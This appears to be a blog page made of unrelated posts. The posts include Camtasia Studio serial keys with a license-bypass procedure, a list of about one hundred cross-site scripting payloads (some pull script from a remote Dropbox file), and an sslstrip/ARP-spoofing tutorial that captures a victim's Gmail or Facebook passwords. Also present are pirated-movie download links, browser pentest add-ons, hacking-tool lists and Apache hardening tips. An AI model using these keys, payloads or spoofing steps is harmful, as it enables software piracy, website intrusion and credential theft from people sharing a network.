Camtasia Studio 8 Latest Version Serial Keys Give Aways
Credits to onhax.net |
Camtasia Studio 8
The screen-capture video tool Camtasia Studio has long balanced a strong set of features with a friendly interface and graceful learning curve. Version 8 continues the tradition with cool, new features that don’t bog down the app with any additional complexity. Camtasia’s price–$300–may raise eyebrows, but make no mistake: this screencasting software is serious business. New and advanced users both should be able to learn the software and start producing professionally looking videos in little time.
Serial Keys ?
Yeah..we got ‘em..You may have seen these keys everywhere on the internet.But we got the right method to activate it..So follow us :)
How to Activate ?
this will be a bit tricky,follow correctly
Download & install the latest trial version of Camstasia Studio
Launch it,always choose 30 day trial mode
After launching go to Help > Enter Software Key
Disconnect internet connectivity from your computer
Paste a serial key from the list below
Fill your Name & Press Finish [ image ]
You will get an error message saying there’s a trouble validating the key,Just OK it [ image ]
Now Exit from Camstasia Studio completely
Reconnect your computer to internet
Now launch Camstasia Studio again (If you get a register message just close it)
That’s it registered :)
License Keys
G4DCD-9CC5J-JTDPC-FQJ9X-X735A
GCABC-CPCCE-BPMMB-XAJXP-S8F6R
EA5AC-CLMAM-A8W6W-EZLYM-LM58F
HLCZF-HDCPL-KGB6W-ZSCAZ-VF6A2
CD2AA-QZBHD-C3KJL-E9HRV-Q797C
ABHKC-9YZZB-55MCB-5A4C7-S5868
Downloads
What is Ethical Hacking?
One grey area in ethical hacking is hacktivism, where the hacker detects and reports (but sometimes exploits) security vulnerabilities as a form of social activism. In these cases the motivation isn’t money, but rather to call attention to an issue or injustice the hacker believes merits social change. However, the victim of the hack may not be so receptive to this message. Ethical hacking should always be undertaken with the express advance consent of the targeted organization – as many black hat hackers claim to be ethical hackers when caught.
Why Use Ethical Hacking?
Why pay someone to hack into your own application or website? To expose its vulnerabilities of course. Any law enforcement officer will tell you to prevent crime, think like a criminal. To test a security system, ethical hackers use the same methods as their malicious brethren, but report problems uncovered to their client instead of taking advantage of them. Ethical hacking is commonplace in the Federal government, where the practice initiated in the 1970s, and many large companies today employ white hat teams within their information security practice. Other online and internet slang terms for ethical hackers include “sneakers”, red teams and tiger teams. Computer programmers can even learn ethical hacking techniques from a variety of certification authorities.In the world of application security, online ethical hacking takes the form of penetration testing. “Pen tests” are performed in as realistic scenarios as possible to ensure that the results accurately mimic what an intruder could potentially achieve. Manual application testing employs human experts – ethical hackers – that attempt to compromise the app and report what they find. Typically a variety of tests are performed, from simple information-gathering exercises to outright attacks that would cause damage if actualized. A full blown ethical hack might even include social engineering techniques such as emailing staff to dupe them into revealing passwords and other account details.
Veracode and Ethical Hacking: Automated Tools to Expose Vulnerabilities
Penetration testing exposes software coding errors and other vulnerabilities that threaten critical data, user accounts and other application functionality. Not all pen tests are performed manually, however. Ethical hackers may employ automated tools such as static analysis and dynamic analysis. Veracode performs both dynamic and static code analysis and finds security vulnerabilities such as malicious code or insufficient encryption that may lead to security breaches. Using Veracode, penetration testers and other ethical hackers can spend more time prioritizing and remediating problems and less time finding them.sacrificing security.
One Hundred Cross-site Scripting Payloads
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <svg><script >alert(1) {Opera}
5) <img/src=`` onerror=this.onerror=confirm(1)
6) <form>
<isindex formaction="javascript:confirm(1)"
7) <img src=``
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <script 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /**/>/**/alert(1)/**/</script /**/
12) "><h1/onmouseover='\u0061lert(1)'>
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form>
<a href="javascript:\u0061lert(1)">X
20) </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
21) <img/	  src=`~` onerror=prompt(1)>
22) <form>
<iframe 	  src="javascript:alert(1)" 	;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
26) <img/src=@  onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
30) �</form>
<input type="date" onfocus="alert(1)">
31) <form>
<textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!--	> alert (1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div>
{IE7}
43) <iframe// src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>
DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script></svg>
83) <script>+-+-1-+-+alert(1)</script>
84) <body onload="<!-->&#10alert(1)">
85) <script itworksinallbrowsers="">/*<script* */alert(1)</script><script>//
confirm(1);</script>
88) <svg><script onlypossibleinopera:-=""> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script> style="x:">
92) <-- img="" onerror="alert(1)" src="`"> --!>
93)<script src="&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)"></script>
94) <div onclick="alert(1)" onmouseover="prompt(1)" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
x</div>
</--></svg></body>
95) "><img https:="" onerror="window.open(" src="x" www.google.com="" />
96) <br />
<form>
<button formaction="javascript:alert(1)">CLICKME
97) <math><a href="https://www.blogger.com/null" xlink:href="//jsfiddle.net/t846h/">click
98) <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a></a></math></button></form>
Turn Your Chrome Browser Into A Penetration Testing tool
1.Web Developer
The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox.
2.d3coder
This extension enables you to encode and decode selected text via the context menu. This reduces the time you spend on looking up encoded values and gives you more time to concentrate on the important things of development.
3.Site Spider
Use this extension to spider a website looking for dead links. One can restrict the spidering to a directory, a domain, or any other regular expression. The spider can also follow one link beyond this restriction, allowing one to find broken external links.
4.Session Manager
A simple yet powerful extension for managing sets of tabs. Session Manager is a simple yet powerful extension that makes it quick and easy to save, update, remove, and restore sets of tabs.
5.Request Maker
Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.
6.EditThisCookie
EditThisCookie is a cookie manager. You can add, delete, edit, search, protect and block cookies.
7.Cache Killer
This extension allows you to easily disable caching in Chrome. When Cache Killer is activated, it will clean your Browser Cache before every page load. With just one click you can disable or enable this feature.
8.XSS Rays
XSS Rays is a security tool to help pen test large web sites. It's core features include a XSS scanner, XSS Reverser and object inspection. Need to know how a certain page filters output? Don't have the source? No problem. XSS Rays will blackbox reverse a XSS filter without needing the source code.
9.Port Scanner
The Port Scanner extension determines lively services on the host using TCP port interrogations. Port Scanner will check which TCP ports are listening. You can test these ports to see if they are running. It is recommended that any services which are not necessary be disabled. Use Port Scanner to scan individual ports to determine if the device is listening on that port. Port Scanner will analyse given IP address or URL for open ports to help you to secure it.
10.HPP Finder
HPP Finder is a Chrome extension designed for detecting HPP attempts. HPP Finder can detect URLs and HTML forms that might be susceptible of parameter pollution, but it is not a complete solution against HPP.
10 Useful Firefox Add-ons For Hackers
Mozilla Firefox
Allows you to customise the way a web page displays or behaves, by using small bits of JavaScript.
2.Live HTTP Headers
Check out the HTTP headers of the webpages you're visiting.
3.HackBar
This toolbar will help you in testing sql injections, XSS holes and site security. It is not a tool for executing standard exploits and it will not teach you how to hack a site. Its main purpose is to help a developer do security audits on his code.
4.Cookies Manager+
View, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.
5.Hide My Ass! Web Proxy
Hide My Ass! operates the most popular browser based web proxy online, the official extension enables you to easily redirect your web traffic through its anonymous proxy network.
6.User Agent Switcher
The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.
7.Webpage Screenshot in Firefox
FireShot Webpage Screenshots captures webpage screenshot entirely.
8.Firebug
Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
9.Firesheep
A Firefox extension that demonstrates HTTP session hijacking attacks.
10.Tamper Data
Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests. Security test web applications by modifying POST parameters.
Source: efytimes.com
8 Most 'Powerful' Supercomputers In The World; Powered by Linux.
Linux |
Here's the list :
1. Tianhe-2
Tianhe-2 or TH-2 (literally "Skyriver-2", idiomatically "Milky Way 2") is a 33.86 petaflops supercomputer located in Sun Yat-sen University, Guangzhou, China. It was developed by a team of 1300 scientists and engineers. It is the world's fastest supercomputer according to the TOP500 list for June and November 2013. The development of Tianhe-2 was sponsored by the 863 High Technology Program, initiated by the Chinese government, the government of Guangdong province, and the government of Guangzhou city. It was built by China's National University of Defense Technology (NUDT) in collaboration with the Chinese IT firm Inspur.
2. K Computer
The K computer is a supercomputer manufactured by Fujitsu, currently installed at the RIKEN Advanced Institute for Computational Science campus in Kobe, Japan. The K computer is based on a distributed memory architecture with over 80,000 computer nodes. It is used for a variety of applications, including climate research, disaster prevention and medical research. The K computer's operating system is based on the Linux kernel, with additional drivers designed to make use of the computer's hardware.
3. IBM Mira
Mira is a petascale Blue Gene/Q supercomputer. It has a performance of 8.16 petaflops and consumes 3.9 MW in power. The supercomputer was constructed by IBM for Argonne National Laboratory's Argonne Leadership Computing Facility with the support of the United States Department of Energy, and partially funded by the National Science Foundation. Mira will be used for scientific research, including studies in the fields of material science, climatology, seismology, and computational chemistry. The supercomputer is being utilised initially for sixteen projects, selected by the Department of Energy.
4. Titan
Titan is a supercomputer built by Cray at Oak Ridge National Laboratory for use in a variety of science projects. Titan is an upgrade of Jaguar, a previous supercomputer at Oak Ridge, that uses graphics processing units (GPUs) in addition to conventional central processing units (CPUs). It is the first such hybrid to perform over 10 petaFLOPS. Titan employs AMD Opteron CPUs in conjunction with Nvidia Tesla GPUs to improve energy efficiency while providing an order of magnitude increase in computational power over Jaguar. It uses 18,688 CPUs paired with an equal number of GPUs to perform at a theoretical peak of 27 petaFLOPS
5. IBM Sequoia
IBM Sequoia is a petascale Blue Gene/Q supercomputer constructed by IBM for the National Nuclear Security Administration as part of the Advanced Simulation and Computing Program (ASC). Record-breaking science applications have been run on Sequoia, the first to cross 10 petaflops of sustained performance. The entire supercomputer runs on Linux, with CNK running on over 98,000 nodes, and Red Hat Enterprise Linux running on 768 I/O nodes that are connected to the filesystem
6. Stampede
Stampede is one of the most powerful machines in the world for open science research. Funded by the National Science Foundation Grant ACI-1134872 and built in partnership with Intel, Dell and Mellanox, Stampede went into production on 7 January, 2013. Stampede comprises 6400 nodes, 102400 cpu cores, 205 TB total memory, 14 PB total and 1.6 PB local storage. The bulk of the cluster consists of 160 racks of primary compute nodes, each with dual Xeon E5-2680 8-core processors, Xeon Phi coprocessor, and 32 GB ram. The cluster also contained 16 nodes with 32 cores and 1 TB ram each, 128 "standard" compute nodes with Nvidia Kepler K20 GPUs, and other nodes for I/O (to a Lustre filesystem), login, and cluster management. Stampede can complete 9.6 quadrillion floating point operations per second.
7. SuperMUC
SuperMUC will be the successor of the Höchstleistungsrechner Bayern II (HLRB II). The SuperMUC will have 18,432 Intel Xeon Sandy Bridge-EP processors running in IBM System x iDataPlex servers with a total of 147,456 cores and a peak performance of about 3 petaFLOPS. The main memory will be 288 terabytes together with 12 petabytes of hard disk space based on the IBM General Parallel File System (GPFS). It will also use a new form of cooling that IBM developed, called Aquasar, that uses hot water to cool the processors, a design that should cut cooling electricity usage by 40 percent, IBM claims.
8. JUQUEEN
JUQUEEN at the Forschungzentrum Jülich is a 28-rack Blue Gene/Q system. It will have a peak performance of about 5,872 Tflops. JUQUEEN runs Red Hat Enterprise Linux.
credits to 4ntipatika
8 Simple Tips to Secure your Apache Web Server
apache http server |
Apache is the most widely used Web server on the Internet. It was developed to work in Unix environment, but was ported to other server operating system like Windows. The Apache web server serves millions of websites and web-applications. A wide range of authentication schemes and a lot of language interfaces support and security features makes it the favorite Web server of millions of users all over the globe.
The stardom and popularity also makes websites that are backed by Apache favorite target among hackers. Websites that are backed by Apache often fall prey for hack attacks not because of security risks and holes in Apache, but mainly because of poorly written code and other security issues associated with Database. Apache and Linux combination provides good security, but things might go wrong if you don’t take the measures. There are several things one need to do to secure Apache. We have compiled a list of simple things you should perform to make you Web server secure.
1. Update
Security holes and potential risks are found and fixed in every Apache release. The developer community is constantly working on new security issues and we can’t stress enough how important it is to update.A good update policy and security policy works hand-in-hand. You should not only update Apache when there is a major release, but also should also install all the patches. It is also wise to update PHP (if you use it) as well when you update Apache.You can check the current version of Apache by using the following command.
# http -vServer version: Apache/2.*.** (Unix)Server built: Mar 12 2014 13:20:23
If it shows that the version of Apache you are running in not up to date, do update.
2. Apache version and OS
If an error occurs, the server might return information about the error along with the Apache version and details about the OS. A simple 404 page can give crucial information about the Web server and OS. In some cases, it might even return details about Apache modules that are also installed in the server.To turn this off, open the config. File (httpd.conf) with a text editor and find the string “ServerSignature On.” It should be On by default. Turn it off simply by replacing “On” by “Off”. Now the HTTP site header and error pages will only show that it runs Apache and will not show the version.
3. Disable Directory Listing
If there is no index file in the root directory, Apache will, by default list all the files in the root directory. There are several ways to prevent Apache from listing the files in the root folder. Again you need to add a couple of lines to the config file. There are 2 ways to doing this. Either set the Option Directive to “-Indexes” or “None.” If you don’t have a clue what we are talking about just add the following lines to the config file.
<directory /var/www/html>Options -IndexesOrder allow,denyAllow from all</directory>
Or use the following code.
<directory></directory>Options NoneOrder allow,denyAllow from all
In some distributions these directive are already set, but it’s better to check, after all better safe than sorry.
4. Secure the config file
If you are a newbie and if you have been following the steps above, you should have conceived the fact that, the httpd.conf file is quite important in keeping your server secure. So it is better to hide your file. You can always unhide it when you want.Use the following command to immunize the config file.
chattr +i /httpd/conf/httpd.conf
From chattr man page:
“A file with the `i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.”
5. Prevent DoS attack by limiting request size
Most Denial of service attacks could be prevented by not allowing large requests. By default the LimitRequestBody is set unlimited. Depending on your website’s requirement the size could be altered. You could also limit requests to more vulnerable directories like upload folders.
6. Disable unwanted Modules
By disabling several modules that are not of any use to you, you can reduce the security vulnerability of your server. To find out the list of all the modules in your Web server, you can use the following command.
# grep LoadModule /etc/httpd/conf/httpd.conf
Analise all the modules in the output list and figure out the ones that are unnecessary. You don’t even have to delete the lines. Just add “#” at the beginning and it will become deactivated after you restart the service.
7. Do not run Apache as root
Apache should not run as root. It is always good to run Apache as a separate user. It will run as daemon or nobody by default. Set up a non-privileged account dedicated for Apache. Never set Apache User or Group to root.
# vi httpd.confGroup apacheUser apache
8. Choose the Right Hosting Provider
This doesn’t have anything to do with fiddling with your Web server. Some of the most popular web hosting services are from the America or Europe. Popular doesn’t mean, highly secure. You don’t necessarily have to buy your web hosting from these hosting providers. If you don’t live in the U.S., you can find a lot of reliable, affordable, and secure hosting providers in your own country. Do you live in Australia? Look for an Australian website hosting provider like EZI Hosting and choose the most popular hosting providers whose IP addresses are not often attacked by hackers.
KEEP SAFE ;)
sslstrip and arpspoofing with Kali linux Tutorial
Kali Linux |
Intention/Intro
Educational purposes only.
This tutorial will teach how to ARP Spoof a network and get user information even from websites with that use encryption (HTTPS). This tutorial we’ll use the Kali Linux (Live CD), the sslstrip software, we’ll modify the etter.conf file, add new rules to the iptables and use the ettercap software.
This tutorial will teach how to ARP Spoof a network and get user information even from websites with that use encryption (HTTPS). This tutorial we’ll use the Kali Linux (Live CD), the sslstrip software, we’ll modify the etter.conf file, add new rules to the iptables and use the ettercap software.
Pre-configurations
The commands below will set the iptables to redirect everything that comes from port 80 to port 10000. Our goal here is to set the sslstrip to strip HTTPS from pages and give to the end user a HTTP page (with no security, no encryption). So, the port that we’ll use to redirect the striped content will be the port 10000.
$echo 1 > /proc/sys/net/ipv4/ip_forward
$iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
Usage
It’s time to run sslstrip and do the tricks that I mentioned before. To run it, use the command below:
$sslstrip -l 10000
Now, open another terminal windows and run the command below:
$ettercap -G
A windows will pop and that’s the ettercap GUI. Click on Sniff > Unifed sniff and choose the interface that you have a internet connection (same as your victims). For exemple, I choose wlan0, but if I’re using a cable, and would’ve choose the eth0 interface. Now click on Host > Scan for hosts. Now click again on Host > Host List. Select your gateway (the IP that you can access your router. It’s usually some IP that ends with 1 [like 192.168.2.1] . Keep in mind that’s not a rule!) and click on the button Target 1. Select the IP that your target is using and click on the button Target 2 (you can select multiples IP’s if you click on them holding the Ctrl or Command key). Now, click on Plugins > Manage Plugins and a list of plugins will appear. Now, double click on dns_spoof and make shore that there’s an asterisk ( * ) by it when you double click it. Now, click on Mitm > Arp spoofing and select the first option that you see in the windows that pop up and click on OK. Now click onStart > Start sniffing. You’re all set! Wait until your target access pages like gmail, facebook, twitter or anything that you have to use credentials. When your target access those sites, the ettercap will show the user and password that your target used. Remember: Thesslstrip is the responsible for making the HTTPS website unsecured! What I’m saying is that the target’s browser will request the page and the server will return a HTTPS page. The sslstrip intercept it on port 10000 and return to the user a HTTP page (no encryption). Beautiful, isn’t it?
Conclusion
This attack is simple to do and very effective. I strongly recommend that you use the Live Kali (instead of installing on your machine or on a VM). I have Kali installed on a computer and it often gives me headache to fix my mistakes. The ettercap might not work if your using a VM. In order to work, you should download/install all the extras VM tools that’s available. The ettercap might not work on a installed Kali. I couldn’t find one reason for that problem yet, but I read that if you uninstall it and install it from the Github resource, it might work better than the one that came with Kali. Warning: To install ettercap from Github, you might face missing libs. It uses a lot of different libs and it will take some time to you get them all installed on your machine. If you want to try to install it, use the commands below:
$sudo apt-get remove ettercap-common ettercap-graphic
$git clone https://github.com/Ettercap/ettercap
$cd ettercap && mkdir build && cmake ../ && make install
Ettercap, sometimes, didn’t work when I pressed the Star Sniffing option. What I did to make it work? Went to the first step of this tutorial and repeated everything.
How can you protect yourself from attacks like this? You could use a software like XArp, create static ARP tables, or you could read this.
Source:http://l33ttutorials.wordpress.com
How can you protect yourself from attacks like this? You could use a software like XArp, create static ARP tables, or you could read this.
Source:http://l33ttutorials.wordpress.com
Diary ng Pangit the movie (Watch Online and free Download)
Diary ng Pangit the Movie |
Ang number 1 best-selling book ng 2013, soon to be blockbuster movie ngayong APRIL 2, 2014! This is the OFFICIAL FULL TRAILER of Diary ng Panget The Movie! :)
Starring:
Nadine Lustre as Eya Rodriguez
James Reid as Cross Sandford
Yassi Pressman as Lory Keet
Andre Paras as Chad Jimenez
Directed by Andoy Ranay
Story by Denny aka HaveYouSeenThisGirl
Watch Online -- Click Here (mediafire)
Download Video -- Click Here (mediafire)
Credits to benjr17
Tags:
diary ng pangit the movie, diary ng pangit the movie free download mediafire, diary ng pangit the movie free download no survey, diary ng pangit the movie watch online, diary ng pangit the movie
what is the top 100 Hacking Tools? (must-have)
leet shares |
Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.
1. Aircrack-ng
2. Kismet
3. inSSIDer
4. KisMAC
Intrusion Detection Systems: Intrusion detection tools are one of the most important part of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.
1. Snort
2. NetCop
Port Scanners
1. Nmap
2. Superscan
3. Angry IP Scanner
Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.
1. TrueCrypt
2. OpenSSH
3. Putty
4. OpenSSL
5. Tor
6. OpenVPN
7. Stunnel
8. KeePass
Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.
1. Ophcrack
2. Medusa
3. RainbowCrack
4. Wfuzz
5. Brutus
6. L0phtCrack
7. fgdump
8. THC Hydra
9. John The Ripper
10. Aircrack - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.
11. Cain and Abel
Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.
1. Hping
2. Scapy
3. Netcat
4. Yersinia
5. Nemesis
6. Socat
Traffic Monitoring: These are tools that let you monitor what websites your employees or children are monitoring.
1. Splunk
2. Nagios
3. P0f
4. Ngrep
Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.
1. Wireshark
2. Tcpdump
3. Ettercap
4. dsniff
5. EtherApe
Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.
1. Metasploit
2. sqlmap
3. sqlninja
4. Social Engineer Toolkit
5. NetSparker
6. BeEF
7. Dradis
For 50 more of such free hacking tools, click here
Vulnerability Scanners: These are programs that have been designed to asses a computer or network’s vulnerability to attacks. The functionality of these tools varies from one to the other, but they all present a detailed analysis of how vulnerable your system is.
1. Nessus
2. OpenVAS
3. Nipper
4. Secunia PSI
5. Retina
6. QualysGuard
7. Nexpose
Web Vulnerability Scanners: While vulnerability scanners are meant for your system, web vulnerability scanners assess the vulnerability of web applications. The identify the security vulnerabilities that your app may have through various tests.
1. Burp Suite
2. WebScarab
3. Websecurify
4. Nikto
5. w3af
Web Proxies: Proxies were originally created in order to add encapsulation to distributed systems. The client contacts a proxy server in order to request an item that exists on your server.
1. Paros
2. Fiddler
3. Ratproxy
4. sslstrip
Rootkit Detectors: This tool is a file and directory integrity checker. It verifies if a file is trustworthy and informs the user if found otherwise.
1. AIDE (Advanced Intrusion Detection Environment)
Firewalls: You obviously know what a Firewall is. These monitor and control the traffic in your network, whether incoming or outgoing. They are essential security tools that are used by the most novice to the most advanced users.
1. Netfilter
2. PF: OpenBSD Packet Filter
Fuzzers: The concept of fuzzing is usually put to use in order to test the security vulnerabilities of computer systems or in the software that runs on them.
1. skipfish
2. Wfuzz
3. Wapiti
4. W3af
Forensics: This refers to tools that are used for computer forensic. They are used in order to find evidence that is existing in computer systems.
1. Sleuth Kit
2. Helix
3. Malteg0
4. Encase
Debuggers: These are tools that are used in order to write exploits, reverse engineer binary files and to analyse malware.
1. GDB
2. Immunity Debugger
Hacking Operating Systems: These are operating systems that have been designed specifically for hackers. These distros are preloaded with tools that a hacker needs etc.
1. Backtrack 5r3
2. Kali Linux
3. SELinux
4. Knoppix
5. BackBox Linux
6. Pentoo
7. Matriux Krypton
8. NodeZero
9. Blackbuntu
10. Samurai Web Testing Framework
11. WEAKERTH4N
12. CAINE (Computer Aided Investigative Environment)
13. Bugtraq
14. DEFT
15. Helix
Other Hacking Tools: There are also other miscellaneous hacking tools that are often used by hackers. They can’t be put into a particular category, but they are still quite useful.
1. Netcat
2. Traceroute
3. Ping.eu
4. Dig
5. cURL